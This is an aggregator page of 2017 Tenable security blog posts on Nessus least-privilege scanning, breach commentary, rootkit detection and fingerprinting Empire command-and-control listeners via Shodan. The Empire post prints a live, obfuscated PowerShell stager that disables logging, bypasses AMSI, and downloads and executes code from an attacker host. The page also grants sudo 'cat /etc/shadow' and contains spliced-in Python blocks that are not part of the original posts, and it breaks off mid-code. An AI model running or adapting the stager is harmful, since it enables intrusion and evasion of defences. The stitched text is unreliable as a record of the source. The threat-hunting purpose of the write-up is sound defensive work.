URL: https://tenable38.rssing.com/chan-8418415/all_p34.html
Channel: Tenable Blog
Showing article 661 to 680 of 1364 in channel 8418415

Channel Details:
* Title: Tenable Blog
* Channel Number: 8418415
* Language: eng
* Registered On: February 27, 2013, 4:19 am
* Number of Articles: 1364
* Latest Snapshot: January 19, 2022, 1:01 pm
* RSS URL: http://feeds.feedburner.com/tenable/qaxl
* Publisher: https://www.tenable.com/
* Catalog: //tenable38.rssing.com/catalog.php?indx=8418415

MR. ROBOT CLEANING HOUSE AT E-CORP
October 27, 2017, 6:00 am

The second episode of Mr. Robot finds Elliot starting his new job at E-Corp. As he joins his new team and looks for a way to delay the shipment of all the paper data to the New York facility, Elliot runs into the normal corporate middle-management delays. He quickly realizes his first obstacle, William the Technology Manager, is up to no good: he is deploying rootkits on phones and selling the personal data they collect. To get around this first obstacle, Elliot breaks out a good tool called theHarvester, and then promptly calls the feds. Watch out Evil Corp, Elliot is cleaning house, while trying to delay the stage two attack.
THEHARVESTER

During a pentest, security professionals go through a reconnaissance phase in which data on the target is collected. Having used theHarvester a few times myself, I found that the time spent collecting subdomains, email addresses and SHODAN results helps to really understand the vantage points into the target for exploitation. In this episode, Elliot uses the tail command to view the results of theHarvester and get his manager's password. He reads the email and identifies that his manager is using rootkits on the mobile devices. Elliot promptly notifies the feds. E-Corp may not be Evil for long.

ROOTKITS

Rootkits on mobile devices, laptops, servers and other types of assets are often hidden very well within the OS, which makes their discovery challenging, to say the least. Tenable.io™ has very advanced technology developed in a series of plugins to detect Malicious Processes, Malicious Content and Malicious Files, with support for Yara. By using the plugins and Yara rules shown below, you can search your network for rootkits or other malicious software.
* 52670 | Web Site Links to Malicious Content
* 59275 | Malicious Process Detection
* 59641 | Malicious Process Detection: Potentially Unwanted Software
* 64687 | Malicious Process Detection: APT1 Software Running
* 64788 | Malicious Process Detection: Malware Signed By Stolen Bit9 Certificate
* 65548 | Malicious Process Detection: User Defined Malware Running
* 71024 | Web Site Hosting Malicious Binaries
* 71261 | Linux Malicious Process Detection
* 71263 | Mac OS X Malicious Process Detection
* 88958 | Malicious File Detection: APT1 Software on System
* 88959 | Malicious File Detection: Malware Signed By Stolen Bit9 Certificate
* 88960 | Malicious File Detection: Invalid Directories
* 88961 | Malicious File Detection
* 88962 | Malicious File Detection: User Defined Malware
* 88963 | Malicious File Detection: Potentially Unwanted Software
* 91223 | Malicious Process Detection: User Defined Malware Running (Linux)
* 91224 | Malicious Process Detection: User Defined Malware Running (Mac OS X)
* 91990 | Malicious File Detection Using Yara

By searching for the three terms "Malicious File", "Malicious Process" and "Hosting Malicious", you can easily locate all the plugins which provide indications of rootkits in your network.

In my test data, you can see I have one system I need to investigate. The plugins return files and URLs to help you better understand and defend against the malware or rootkit.

MODERN ATTACK SURFACE

Detecting rootkits was difficult even when the problem was confined to managed devices; now that the modern IT landscape consists of web apps, containers, cloud instances and IoT, detecting rootkits becomes even more challenging. Tenable.io is the first Cyber Exposure platform to provide you with holistic visibility across your modern attack surface, allowing you to detect rootkits or other malicious software on your network. Start a free 60-day trial of Tenable.io for your organization today.
CONFIGURING LEAST PRIVILEGE SSH SCANS WITH NESSUS
October 30, 2017, 6:43 am

Credentialed scans have long been advocated as the quickest and most accurate way to perform a vulnerability assessment against any network. But as with all things in technology, they run into the two usual roadblocks: people and processes. When the topic of credentialed network scans is discussed, it inevitably leads to questions such as: who is requesting access and why? What level of privileges is needed and why? Which commands will be run and why? All legitimate questions which should rightly be asked before granting access to any system. But the back-and-forth between different teams typically leads to a long, drawn-out process that eventually ends in either the requestor being denied access or getting access to a limited account, which may lead to incomplete scan results.

To help solve this problem, our customers have asked us to provide transparency around which commands are run by a Nessus® scan, what privileges are required to run those commands and, if the commands fail, which Nessus plugins would fail as a result. An additional requirement was to provide this information in an easy-to-consume output format so that they can configure a scan account with the least privileges and still be able to perform a complete and accurate scan. With the recent release of Nessus 6.11, we are taking steps to address that issue by releasing a beta feature which will allow our customers to do just that across Tenable.io™ Vulnerability Management, Nessus and Security Center™.
REQUIREMENTS

* Nessus 6.11 or later, either standalone or managed by Tenable.io Vulnerability Management or Security Center
* Scan target operating system: CentOS, Red Hat, Amazon Linux, SuSE, Ubuntu, Debian, HP-UX, Scientific Linux, AIX, Oracle Linux, Gentoo

SCAN CONFIGURATION

At a high level, the process can be summarized in five simple steps:

1. Configure a scan account to run with sudo privileges
2. Enable the 'Attempt Least Privilege' preference in the scan policy
3. Review the plugin output of Nessus plugin IDs #102094 and #102095
4. Update the /etc/sudoers file based on the results of plugin #102094
5. Repeat step 4 until every command which must run with higher privileges is accounted for in the /etc/sudoers file

STEP 1: CONFIGURE USER TO RUN COMMANDS VIA SUDO

Log in to the system as the root user and create a normal user account. Run visudo to edit the /etc/sudoers file, and add the commands the user is allowed to run with sudo. In the example below I created a user 'nessus_scan_account', assigned it to a SUDOER User_Alias, and allowed that alias to run the '/usr/bin/dmidecode' command, which requires root privileges.

STEP 2: ENABLE 'ATTEMPT LEAST PRIVILEGE' CHECKBOX IN SCAN POLICY

Follow the steps below to enable the 'Attempt Least Privilege' preference in the scan policy.

Tenable.io Vulnerability Management & Nessus

Click Scans -> New Scan -> Advanced Scan -> Credentials -> SSH -> Attempt Least Privilege

When this preference is enabled, Nessus plugins attempt to execute commands with least privilege (i.e. without privilege escalation); if the initial attempt fails, the plugin retries the command with privilege escalation. It also logs which commands failed and which succeeded with privilege escalation and reports this information in two plugins (#102094, #102095), discussed in the next steps. Because the same command is run twice, customers should note that scans could run 10-30 percent slower according to our lab tests.
Security Center

For Security Center, follow the screens below to enable the preference.

Click Scans -> Policies -> Add -> Advanced Scan -> Authentication -> Attempt Least Privilege

STEP 3: REVIEW PLUGIN OUTPUTS

Once the scan finishes, review the output of plugins #102094 and #102095 to determine which plugins successfully ran with privilege escalation and which plugins failed due to insufficient privileges.

SSH COMMANDS RAN WITH PRIVILEGE ESCALATION (#102095)

Plugin #102095 reports all plugins which ran with escalated privileges. The plugin output is in YAML and includes the account used, the plugin file name, id and name, and the command it ran. This plugin helps users verify that only authorized commands are run with sudo privileges.

SSH COMMANDS REQUIRE PRIVILEGE ESCALATION (#102094)

Plugin #102094 reports all plugins which failed to run with escalated privileges due to insufficient privileges. As with the previous plugin, the output is in YAML to make it easier to build the /etc/sudoers file. It includes the account used, the plugin file name, id and name, and the command it ran. Customers should review the output of this plugin to fine-tune the commands which can be run with the sudo account. Note that the command 'cat /etc/shadow' failed in the example below. We will resolve this issue in the next step.

STEP 4: UPDATE /ETC/SUDOERS FILE

In the previous step, plugin #102094 reported that execution of the command 'cat /etc/shadow' failed because privilege escalation failed. We can easily resolve this by adding '/bin/cat /etc/shadow' as an allowed command to the SUDOER alias we created earlier in the /etc/sudoers file, which will allow the next scan to run this command successfully with escalated privileges.
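The step 3 review and the step 4 sudoers update, worked through as an added example (this is not Tenable's code and not how Nessus itself builds anything). It assumes the commands have already been pulled out of the two plugins' YAML output into plain lists; the command lists, the alias names NESSUS_SCANNERS and NESSUS_CMDS, and the helper names are all constructed for the example. The allow list is widened only by absolute-path commands with literal arguments, so a failed command cannot turn into a wildcard or shell-chained sudo rule, and the commands plugin #102095 says actually ran with escalation are cross-checked against what was granted.

```python
# Added example (not Tenable's code): turn the commands that Nessus plugin
# #102094 reports as needing privilege escalation into a least-privilege
# sudoers fragment for the scan account, and cross-check the commands that
# plugin #102095 says ran with sudo against that allow list. The command
# lists below are constructed sample data; the plugins' YAML is not parsed.
import re

# Wildcards and shell metacharacters in a sudoers command entry would let the
# rule match far more than the one command the scan needs, so they are rejected.
UNSAFE_CHARS = re.compile(r"[*?;&|<>`$(){}\[\]\n]")


def is_safe_command(cmd):
    """True if cmd is an absolute path followed only by literal arguments."""
    return cmd.startswith("/") and UNSAFE_CHARS.search(cmd) is None


def merge_failed(allowed, failed):
    """Step 4/5 loop: add every command that failed privilege escalation to the
    allow list, preserving order and skipping duplicates. Unsafe entries raise
    rather than being written into sudoers silently."""
    merged = list(allowed)
    for cmd in failed:
        if not is_safe_command(cmd):
            raise ValueError("refusing %r: not an absolute path with literal args" % cmd)
        if cmd not in merged:
            merged.append(cmd)
    return merged


def render_sudoers(account, commands, user_alias="NESSUS_SCANNERS", cmnd_alias="NESSUS_CMDS"):
    """Render a sudoers fragment: a User_Alias for the scan account, a Cmnd_Alias
    listing exactly the permitted commands, and one rule tying them together.
    Check the result with 'visudo -c' before installing it."""
    for cmd in commands:
        if not is_safe_command(cmd):
            raise ValueError("unsafe command in allow list: %r" % cmd)
    return (
        "User_Alias %s = %s\n" % (user_alias, account)
        + "Cmnd_Alias %s = %s\n" % (cmnd_alias, ", ".join(commands))
        + "%s ALL = (root) NOPASSWD: %s\n" % (user_alias, cmnd_alias)
    )


def unauthorized_escalations(ran_with_sudo, allowed):
    """Commands plugin #102095 reports as run with escalation that are not on
    the allow list: sudoers is broader than intended, or another grant exists."""
    return [cmd for cmd in ran_with_sudo if cmd not in allowed]


# Constructed sample data standing in for the command fields of the two plugins.
ALLOWED_AFTER_STEP1 = ["/usr/bin/dmidecode"]
FAILED_PER_102094 = ["/bin/cat /etc/shadow", "/usr/bin/dmidecode"]
RAN_PER_102095 = ["/usr/bin/dmidecode", "/bin/cat /etc/shadow", "/usr/sbin/dmsetup status"]

if __name__ == "__main__":
    allowed = merge_failed(ALLOWED_AFTER_STEP1, FAILED_PER_102094)
    print(render_sudoers("nessus_scan_account", allowed))
    print("ran with sudo but not granted:", unauthorized_escalations(RAN_PER_102095, allowed))
```

Running it prints the three-line sudoers fragment for nessus_scan_account and flags the constructed "/usr/sbin/dmsetup status" entry as an escalation that no rule in the fragment explains; that is the case plugin #102095 is there to catch. Because the file is regenerated from the merged list each pass, repeating steps 4 and 5 never accumulates duplicate or hand-edited entries.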
You could also continue to block certain privileged commands from running by not updating the /etc/sudoers file, accepting the risk that certain vulnerabilities will not be detected because of incomplete information.

STEP 5: REPEAT

To perform an accurate authenticated scan, repeat step 4 until every command that fails is accounted for in the /etc/sudoers file.

At this point, one might wonder, "Why not just share a static list of SSH commands with customers?" The reason is two-fold. First, we routinely add new commands to our plugins, so a static file risks going stale. And second, we don't always know whether a command will require admin privileges across a wide variety of operating systems.

WRAP-UP

In this blog post, we demonstrated how a user can create a tailored Nessus scan account to perform authenticated scans over SSH with the least privileges required to perform the scan. Currently, the feature is supported on a limited number of OSs, and we expect to roll out support for additional OSs over the next few months. If you have feedback about the feature, please reach out to Tenable™ support. We would love to hear from you.

THE EQUIFAX BREACH – A CYBER WTF MOMENT
October 30, 2017, 10:08 am

Now that some time has passed since the news broke on the Equifax breach, we've had time to ascertain the facts, digest what happened and draw some conclusions. It has taken a while, because for the first few weeks the company slowly doled out bits and pieces of information. For starters, it is not even remotely acceptable for the CEO of a tech company, an information company, or any other company leveraging technology to be clueless about his organization's cyber exposure and technology risk.
Former Equifax CEO Richard Smith's statement before Congress about the catastrophic breach affecting 145 million Americans was dumbfounding. The company's willingness to blame the breach on a single engineer not acting quickly enough to patch a known vulnerability can only be characterized as a total face-palm moment. In fact, the whole Equifax explanation is such a long series of face-palm moments that I now have a migraine.

Cyber 101 teaches us that security requires people, process and technology. I won't comment on the people side of this incident, since I don't know them personally. There was clearly a series of technology failures. How did they operate with a vulnerability scanner that they didn't know was incapable of detecting these highly publicized critical vulnerabilities? How did they not have the technology to detect the incident between May 13th and July 30th, allowing 79 days of active exfiltration of so much data? And how do you implement processes where the entire cyber infrastructure of Equifax, and securing access to all of this incredibly sensitive information about hundreds of millions of people, boils down to one person? In what world does this seem like a reasonable standard of care? Why did the breach response process take so long? And why was their process so poorly understood and coordinated across the executive team that doing the right thing became effectively impossible?

The company's leadership not only showed a blatant disregard for securing the information they were responsible for stewarding, they displayed a foundational lack of moral compass, burying deep within the fine print that potential breach victims were waiving their legal rights to sue in exchange for finding out if their data was exposed, and then offering free identity theft protection that actually isn't free after a year.

You don't have to be a genius to realize that the cyber world is a nasty place. Using technology of any kind isn't risk-free.
All organizations and their leaders have a responsibility to understand what systems they rely on, where they are exposed, and to have plans for actively managing their risk. Breaches will happen, even to good security programs and to organizations that go the extra mile to protect themselves, their customers and the information they are entrusted with stewarding. Equifax just wasn't one of those cases, not by a long mile.

THE YEAR OF THE MODERN ATTACK SURFACE
November 6, 2017, 11:41 am

If there's one thing 2017 has taught us so far, it's that the attack surface has changed. Cloud, containers, custom web apps, IoT, and OT are all part of the milieu that's forcing security teams to up their game. Basic cyber hygiene is more important, yet more challenging, than ever. Consider four of the year's biggest security headlines:

* NotPetya: an aggressive worm using multiple exploits that delivered destructionware encrypting the target's data without the possibility of recovery; NotPetya generated over $200 million in damage per company to Merck, FedEx (TNT Express), Maersk, and possibly others
* Equifax: a catastrophic breach that compromised the sensitive personal information of more than 100 million people, enabled by a known vulnerability in the Apache Struts web application framework
* OT / ICS threats: an unprecedented series of recent threats to OT infrastructure, including CrashOverride/Industroyer and the October 2017 DHS/FBI alert on an APT campaign targeting energy and other critical infrastructure
* Reaper: a potentially massive new IoT botnet that's one of the first to exploit vulnerabilities in device firmware rather than brute-forcing passwords, with the number of affected devices perhaps as large as one million

If 2015 was the year of the endpoint, recent attacks make clear that 2017 is the year of the modern attack surface. The wave of highly publicized breaches from 2013-2015, including Target, Home Depot, Anthem, and OPM, all targeted the endpoint. But unlike the attacks of yesterday, the headlines of today involve attacks against the modern attack surface: cloud, web applications, IoT, critical infrastructure, and more. Securing the endpoint, while necessary, is no longer enough. The attack surface has expanded. Server and endpoint hardening, operational technology (OT) asset and vulnerability detection, IoT discovery and hardening, container and web app vulnerability identification and mitigation: these are all table stakes for effectively managing cyber exposure. Attackers will always find the weak link, so understanding and protecting what matters most across your entire attack surface is essential.

It's no different from managing basic physical security in your home. You wouldn't lock just the front windows of your house and ignore those in the back. Locking every first-floor window and door when you leave home is the minimum acceptable security. Similarly, security teams require continuous visibility, context, and insight into all assets. Focusing on server infrastructure leaves blind spots in the cloud and containers. Focusing on endpoints leaves one vulnerable to web app and IoT attacks. Focusing on IoT leaves the whole rest of the environment a question mark.

And even seeing all your assets isn't enough. Just as a police department must distinguish between petty vandalism, a home invasion, and a riot when triaging calls, security teams must understand which vulnerabilities and issues actually create the most cyber risk for their business. Speed of visibility is helpful, but without broader context and prioritization it's useless. Imagine the police treating graffiti as an urgent threat and racing through town with sirens blaring. No security team wants to waste its time by racing mindlessly ahead.
Although we don't know every detail of the Equifax breach, public reporting suggests it was a disastrous example of poor vulnerability prioritization and risk management. The company knew the Struts vulnerability existed in its web apps, but for whatever reasons it didn't act quickly or effectively enough to protect the immensely sensitive data accessible through those apps. This is exactly why full attack surface visibility and risk-based prioritization are essential for managing cyber exposure.

Regulatory compliance and policy reporting are another reason security teams need complete visibility and insight across assets. Security and compliance teams often need to demonstrate compliance with PCI, HIPAA, CIS Critical Security Controls, NIST CSF, ISO/IEC 27001/27001, or any number of other frameworks. Without visibility into the entire computing environment, this is often impossible or at best highly manual.

It's not too late to avoid the next NotPetya or Equifax, but it means getting serious about understanding your full environment, with all its dark corners, unmanaged assets, and forgotten systems. Turning a blind eye or focusing on silos won't keep you safe.

HIDING BEHIND THE APT HELPLESSNESS DEFENSE...REALLY?
November 13, 2017, 5:39 am

Former Equifax CEO Richard Smith's Congressional testimony was a real WTF moment for many of us who work in the cyber field. Last week, former Yahoo CEO Marissa Mayer testified about Yahoo's 2013 and 2014 data breaches, leaving us with intentionally vague, if not misleading, statements.
Mayer asserted that in both of the breaches, "Russian Intelligence Officers and state-sponsored hackers were responsible for highly complex and sophisticated attacks on Yahoo's systems." What we haven't seen in Yahoo's case is any further detail of what these "sophisticated attacks" actually looked like.

In cyber, details matter A LOT. We do forensic analysis and read through numerous incident reports, gaining knowledge, identifying patterns and trying to step up our game. We know that all threat actors, including government intelligence services, cyber criminals, and hacktivists, readily use common exploits and phishing techniques whenever possible. Why? Because, among other reasons, they're readily available at no cost and make attack attribution harder. In a vast supermajority of breaches, the victims were ultimately compromised by the seemingly simple things. Equifax's catastrophic breach occurred because they failed to identify and patch a known vulnerability in their Apache Struts implementation for which updates and workarounds were available. After one quarter, they claim the incident has cost the company over $75M. On the last earnings call, Merck's CFO announced that Petya, which leveraged a known vulnerability with readily available patches and workarounds, resulted in $135M of lost revenue and $175M in additional cost. Home Depot, Target: the list goes on and on.

When breaches occur, we (shareholders, customers, citizens, lawmakers) start looking for answers. It seems that many leaders are happy to claim that "an APT did it" and ask "how are we supposed to protect ourselves from nation-state adversaries?" These are perfect examples of learned, or at least misleading, helplessness. We know perfect security doesn't exist. What we are seeing, however, is far from that: organizations falling victim to simple exploits, not sophisticated, super-advanced hacking techniques.
Let's be clear: state actors may be behind an attack, but they're taking full advantage of lackadaisical security practices to get in. The questions Congress should be asking, and ultimately the courts will be asking, ought to be less focused on who the attackers were and more on how they got in. Were these organizations exercising a reasonable standard of care in protecting themselves? Verizon, for example, appears to be stepping up Yahoo's security posture since the acquisition.

We can't be lulled into a false sense of helplessness based on our worst fears. When it boils down to it, it's very rarely the most sophisticated zero-day exploit, against which very little could have been done, that's tripping us up; it's the simple and seemingly easy stuff.

I'm frequently asked what organizations can do to protect themselves from APTs. The first step is obvious: do the basics really, really well. Know where you have systems, and which ones you rely on. Know where they are exposed and exercise good cyber hygiene practices in maintaining them. Use multi-factor authentication pervasively and make sure tight controls are in place to manage privileged accounts. Use any number of modern techniques to monitor for intrusions. Doing the cyber basics well might not be sexy, but it is foundational to defending against APTs, and it makes a huge difference. Good cyber hygiene is ultimately the reason why organizations that run tight ships suffer far fewer intrusions, including fewer intrusions from advanced threat actors.

IDENTIFYING EMPIRE HTTP LISTENERS
November 21, 2017, 10:06 am

Empire is a popular open source post-exploitation framework.
The framework can very roughly be broken down into two parts: agents and listeners. An agent is an implant that lives on the victim’s computer. A listener resides on the attacker’s command and control server and handles communication with the agent. A lot of work has gone into making agents difficult to find. Less has been done to hide listeners. In this write up, I point out mistakes that have been made in Empire’s HTTP listeners and then look at some listeners found in the wild. Empire has five different HTTP-based listeners. From a network point of view, they’re similar in that a request to “/” results in a 404 Not Found error. albinolobster@ubuntu:~$ curl -i http://192.168.1.204/ HTTP/1.0 404 NOT FOUND Content-Type: text/html Content-Length: 233 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: Microsoft-IIS/7.5 Date: Thu, 16 Nov 2017 21:36:21 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>404 Not Found</title> <h1>Not Found</h1> <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p> Perhaps that response doesn’t look interesting, but it’s enough to fingerprint an Empire HTTP listener. CREATING THE SHODAN FILTER One of the important things to know about Empire is that it’s built on top of Flask. Flask uses Werkzeug for some of its HTTP functionality. Empire’s dependency on Werkzeug is immediately evident in the HTTP response because the error message, “The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again” is hardcoded in Werkzeug. Punching the query title:”404 Not Found” +”Server:Wekzeug” into Shodan shows that Werkzeug very reliably serves a 404 page that is 233 bytes. This gives us a great starting point for finding Empire listeners on Shodan: title:"404 Not Found" +"Content-Length: 233" yields ~24,000 entries. 
We can’t use the Server field in the HTTP response because Empire allows the user to modify it. Another important detail about Flask and Werkzeug is that they don’t support HTTP 1.1. You can actually see in the server’s response that it starts by declaring “HTTP/1.0”. However, Empire’s HTTP response contains a feature introduced in HTTP 1.1. The Cache-Control field, originally included in RFC 2068, “Hypertext Transfer Protocol -- HTTP/1.1”, was introduced into Empire in a commit to avoid caching. Empire isn’t the first or last HTTP server to backport Cache-Control, but it does help us narrow the field a bit. The Shodan filter title:"404 Not Found" +"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate" -"post-check=" -"pre-check=" -"private" has 406 results. While we’re talking about RFC violations, it should be noted that use of the Pragma field, also introduced in the caching commit, is not correct. According to RFC 1945, “Hypertext Transfer Protocol -- HTTP/1.0”, use of no-cache with Pragma is intended for HTTP requests only. Again, Empire is not the first to ignore the RFC. In fact, Pragma: no-cache is widely used in HTTP server responses. RFC be damned. However, Werkzeug doesn’t use it by default so Empire’s usage helps narrow the field even further: title:"404 Not Found" +"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate" -"post-check=" -"pre-check=" -"private" +"Pragma: no-cache" has 306 results. There is one more RFC violation I want to point out, again from the caching commit, and that is the use of the Expires field. Both HTTP 1.0 and 1.1 specify that this field should contain a date. For example: Expires: Thu, 01 Dec 1994 16:00:00 GMT. Empire uses Expires: 0 which both RFCs specifically call out as incorrect (although 1.0 says 0 should be accepted and 1.1 says it must be accepted). 
The Shodan filter

    title:"404 Not Found" +"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate" -"post-check=" -"pre-check=" -"private" +"Pragma: no-cache" +"Expires: 0"

has 301 results. It should also be noted that Microsoft IIS servers generally don't use Expires: 0, which means Empire's default value of Server: Microsoft-IIS/7.5 isn't a good fit.

There is one more field that we know an Empire HTTP listener must have, and that's the Server field. As previously mentioned, this field is user configurable, so you shouldn't try to key off of its contents. But simply requiring the field to be present narrows the results down to 298:

    title:"404 Not Found" +"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate" -"post-check=" -"pre-check=" -"private" +"Pragma: no-cache" +"Expires: 0" +"Server:"

We have more or less exhausted what we know an Empire HTTP listener response should contain. Now we need to add to the filter what we know it should not contain. For example, Empire doesn't serve up any "X-" fields or Set-Cookie. My final Shodan filter has 282 results:

    title:"404 Not Found" +"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate" -"post-check=" -"pre-check=" -"private" +"Pragma: no-cache" +"Expires: 0" +"Server:" -"X-" -"Set-Cookie:" -"Connection:" -"Etag" -"Last-Modified" -"Accept-Ranges:" -"Access-Control"

ARE THOSE REALLY EMPIRE LISTENERS?

The logic behind the Shodan filter is fairly sound, but cautious readers should be asking themselves, "How can you be sure all of the results are Empire listeners?" You can't be sure. Obviously, non-Empire servers could have the exact same HTTP banner. However, there is one more mistake in Empire that will allow us to confirm whether a server is an Empire listener or not. At the beginning of this write-up, I made an HTTP request to "/" which resulted in a 404 error response. This is because Empire hasn't implemented a route for "/".
However, Empire has implemented a route for literally everything else. For example, the following request yields a 200 OK:

    albinolobster@ubuntu:~$ curl -I http://192.168.1.204/theyregooddogsbrent
    HTTP/1.0 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 173
    Cache-Control: no-cache, no-store, must-revalidate
    Pragma: no-cache
    Expires: 0
    Server: Microsoft-IIS/7.5
    Date: Fri, 17 Nov 2017 14:03:20 GMT

On a normal server, "/" often maps to index.html, index.php, index.asp, etc. So it's pretty odd if you request "/" and get a 404 but request "/index.html" and get a 200. Not only that, but the HTTP content for most 200 OKs is hardcoded in Empire. Using this knowledge we can verify, with very little doubt, that a server is an Empire listener.

    albinolobster@ubuntu:~$ curl -I http://192.168.1.204/
    HTTP/1.0 404 NOT FOUND
    Content-Type: text/html
    Content-Length: 233
    Cache-Control: no-cache, no-store, must-revalidate
    Pragma: no-cache
    Expires: 0
    Server: Microsoft-IIS/7.5
    Date: Fri, 17 Nov 2017 14:24:06 GMT

    albinolobster@ubuntu:~$ curl -i http://192.168.1.204/index.html
    HTTP/1.0 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 173
    Cache-Control: no-cache, no-store, must-revalidate
    Pragma: no-cache
    Expires: 0
    Server: Microsoft-IIS/7.5
    Date: Fri, 17 Nov 2017 14:24:19 GMT

    <html><body><h1>It works!</h1><p>This is the default web page for this server.</p><p>The web server software is running but no content has been added, yet.</p></body></html>

EMPIRE IN THE WILD

The Shodan filter seems to be quite accurate. Of the 282 servers listed on Shodan, I only counted one false positive and one I wasn't sure about among the servers that were still reachable. Some servers, however, don't serve up the default page for index.html; instead they hand out a stager. For example, the following response is Empire's PowerShell stager.
    albinolobster@ubuntu:~$ curl http://xx.xx.xx.xx:8080/index.html
    IF($PSVErsionTAble.PSVeRSiOn.MAjoR -Ge 3){$GPS=[rEf].AssEmBlY.GEtTYPe('System.Management.Automation.Utils')."GEtFiE`ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUE($NUll);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}Else{[SCRIptBlocK]."GetFIe`ld"('signatures','N'+'onPublic,Static').SETVAlue($NULL,(NEW-ObJeCt CoLlECtionS.GeNeRIC.HashSet[striNG]))}[ReF].AssEmbLY.GEtTYPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFiELd('amsiInitFailed','NonPublic,Static').SEtVaLUE($nuLL,$tRUE)};};[SYSteM.NET.SErvICePOIntManaGER]::EXpeCT100ContINUe=0;$WC=New-ObJEcT SYstem.NET.WEBClIENT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEAdErs.AdD('User-Agent',$u);$WC.ProxY=[SYsteM.NET.WebRequeSt]::DefauLtWebPRoxy;$WC.PRoxY.CreDeNTIAlS = [SysteM.NET.CrEdenTiAlCaChE]::DEfaULtNEtWorkCredEnTiAls;$Script:Proxy = $wc.Proxy;$K=[SystEm.TeXT.EncOdING]::ASCII.GEtByteS('9bd4b7087332164f0bd38400f1485f6f');$R={$D,$K=$ARgs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXOr$S[($S[$I]+$S[$H])%256]}};$ser='xxxx://read32.ddns.net:8080';$t='/admin/get.php';$wC.HEAderS.ADd("Cookie","session=P9ax+ES/3uPoTFnzu45H+xlR9ms=");$data=$WC.DOWnLOAdData($sEr+$t);$Iv=$DaTa[0..3];$dAta=$data[4..$DaTa.LEnGTH];-jOIn[ChAr[]](& $R $DaTa ($IV+$K))|IEX

I also found it interesting that few listeners changed the default Server field from Microsoft-IIS/7.5. The following table lists the non-default Server values that I observed.

    Server Value          Count
    Microsoft-IIS/8.5     7
    Microsoft-IIS/9.0     1
    Microsoft-IIS/10.0    1
    BigIP                 1
    Apache                1
    Apache/2.4.6          1
    web012                1
    nginx/1.8.0           1

To my knowledge, there is no such thing as IIS 9.0; the versioning jumped from 8.5 to 10.0.
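The two-step check built up in the Shodan and verification sections above (the header fingerprint behind the final Shodan filter, then the "/" versus arbitrary-path confirmation) can be run directly against a candidate host's responses. The following Python is an added example written for this page, not Empire's code and not Tenable's plugin 99592. The two sample responses are constructed to mirror the curl output shown earlier; the required header values, the 233-byte Werkzeug 404 and the 173-byte hardcoded "It works!" page are the values observed in this post, and the double space after "server." in the sample 404 body is an assumption about Werkzeug's text that makes the body 233 bytes.

```python
# Fingerprint an Empire HTTP listener from raw HTTP responses (added example).

WERKZEUG_404_TEXT = ("The requested URL was not found on the server. If you entered "
                     "the URL manually please check your spelling and try again.")
# Body Empire hardcodes for 200 responses to unrouted paths (173 bytes).
EMPIRE_DEFAULT_PAGE = ("<html><body><h1>It works!</h1><p>This is the default web page for "
                       "this server.</p><p>The web server software is running but no "
                       "content has been added, yet.</p></body></html>")
# Exact header values every Empire 404 carries; Server is configurable, so only its presence counts.
REQUIRED_404_HEADERS = {
    "content-length": "233",
    "cache-control": "no-cache, no-store, must-revalidate",
    "pragma": "no-cache",
    "expires": "0",
}
# Header prefixes Werkzeug/Empire never emit (the negative terms of the Shodan filter).
FORBIDDEN_PREFIXES = ("x-", "set-cookie", "connection", "etag", "last-modified",
                      "accept-ranges", "access-control")


def parse_response(raw: str):
    """Split a raw response into (status code, {lower-cased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def matches_404_fingerprint(raw: str) -> bool:
    """Step 1: does the response to "/" look like a hit for the final Shodan filter?"""
    status, headers, body = parse_response(raw)
    if status != 404 or "server" not in headers:
        return False
    if any(headers.get(name) != value for name, value in REQUIRED_404_HEADERS.items()):
        return False
    if any(name.startswith(FORBIDDEN_PREFIXES) for name in headers):
        return False
    return WERKZEUG_404_TEXT in " ".join(body.split())   # whitespace-normalised text match


def is_empire_listener(root_response: str, other_path_response: str) -> bool:
    """Step 2: "/" is the Werkzeug 404 while any other path returns Empire's hardcoded page."""
    if not matches_404_fingerprint(root_response):
        return False
    status, _, body = parse_response(other_path_response)
    return status == 200 and body == EMPIRE_DEFAULT_PAGE


# Constructed samples mirroring the curl output in this post.
EMPIRE_ROOT_404 = (
    "HTTP/1.0 404 NOT FOUND\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 233\r\n"
    "Cache-Control: no-cache, no-store, must-revalidate\r\n"
    "Pragma: no-cache\r\n"
    "Expires: 0\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Date: Thu, 16 Nov 2017 21:36:21 GMT\r\n"
    "\r\n"
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n'
    "<title>404 Not Found</title>\n<h1>Not Found</h1>\n"
    "<p>The requested URL was not found on the server.  If you entered the URL "
    "manually please check your spelling and try again.</p>\n"
)
EMPIRE_INDEX_200 = (
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 173\r\n"
    "Cache-Control: no-cache, no-store, must-revalidate\r\n"
    "Pragma: no-cache\r\n"
    "Expires: 0\r\n"
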